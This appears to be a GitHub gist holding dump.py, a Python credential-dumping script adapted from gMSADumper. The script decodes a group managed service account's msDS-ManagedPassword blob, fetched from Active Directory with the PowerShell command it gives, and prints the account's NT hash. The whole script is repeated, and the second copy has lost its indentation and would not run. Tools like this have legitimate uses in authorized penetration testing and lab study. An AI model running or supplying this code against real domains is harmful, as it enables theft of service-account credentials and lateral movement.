xct/dump.py Secret

## dump.py
#!/usr/bin/env python3

# script based on https://github.com/micahvandeusen/gMSADumper/blob/main/gMSADumper.py

# 1. Get Blob: (Get-ADServiceAccount -Identity 'account_name' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
# 2. Line breaks to commas: https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5C%5Cn'%7D,',',true,false,true,false)
# 3. copy pasta into data array below

from ldap3 import ALL, Server, Connection, NTLM, SASL, KERBEROS, extend, SUBTREE
import argparse
import binascii
from Cryptodome.Hash import MD4
from impacket.ldap.ldaptypes import ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, LDAP_SID, SR_SECURITY_DESCRIPTOR
from impacket.structure import Structure
import sys

data = [...]
data = bytes(data)

class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    structure = (
        ('Version','<H'),
        ('Reserved','<H'),
        ('Length','<L'),
        ('CurrentPasswordOffset','<H'),
        ('PreviousPasswordOffset','<H'),
        ('QueryPasswordIntervalOffset','<H'),
        ('UnchangedPasswordIntervalOffset','<H'),
        ('CurrentPassword',':'),
        ('PreviousPassword',':'),
        #('AlignmentPadding',':'),
        ('QueryPasswordInterval',':'),
        ('UnchangedPasswordInterval',':'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self, data):
        Structure.fromString(self,data)

        if self['PreviousPasswordOffset'] == 0:
            endData = self['QueryPasswordIntervalOffset']
        else:
            endData = self['PreviousPasswordOffset']

        self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
        if self['PreviousPasswordOffset'] != 0:
            self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]

        self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
        self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]


blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)
hash = MD4.new ()
hash.update (blob['CurrentPassword'][:-2])
passwd = binascii.hexlify(hash.digest()).decode("utf-8")
print(passwd)
	#!/usr/bin/env python3

	# script based on https://github.com/micahvandeusen/gMSADumper/blob/main/gMSADumper.py

	# 1. Get Blob: (Get-ADServiceAccount -Identity 'account_name' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
	# 2. Line breaks to commas: https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5C%5Cn'%7D,',',true,false,true,false)
	# 3. copy pasta into data array below

	from ldap3 import ALL, Server, Connection, NTLM, SASL, KERBEROS, extend, SUBTREE
	import argparse
	import binascii
	from Cryptodome.Hash import MD4
	from impacket.ldap.ldaptypes import ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, LDAP_SID, SR_SECURITY_DESCRIPTOR
	from impacket.structure import Structure
	import sys

	data = [...]
	data = bytes(data)

	class MSDS_MANAGEDPASSWORD_BLOB(Structure):
	structure = (
	('Version','<H'),
	('Reserved','<H'),
	('Length','<L'),
	('CurrentPasswordOffset','<H'),
	('PreviousPasswordOffset','<H'),
	('QueryPasswordIntervalOffset','<H'),
	('UnchangedPasswordIntervalOffset','<H'),
	('CurrentPassword',':'),
	('PreviousPassword',':'),
	#('AlignmentPadding',':'),
	('QueryPasswordInterval',':'),
	('UnchangedPasswordInterval',':'),
	)

	def __init__(self, data = None):
	Structure.__init__(self, data = data)

	def fromString(self, data):
	Structure.fromString(self,data)

	if self['PreviousPasswordOffset'] == 0:
	endData = self['QueryPasswordIntervalOffset']
	else:
	endData = self['PreviousPasswordOffset']

	self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
	if self['PreviousPasswordOffset'] != 0:
	self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]

	self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
	self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]


	blob = MSDS_MANAGEDPASSWORD_BLOB()
	blob.fromString(data)
	hash = MD4.new ()
	hash.update (blob['CurrentPassword'][:-2])
	passwd = binascii.hexlify(hash.digest()).decode("utf-8")
	print(passwd)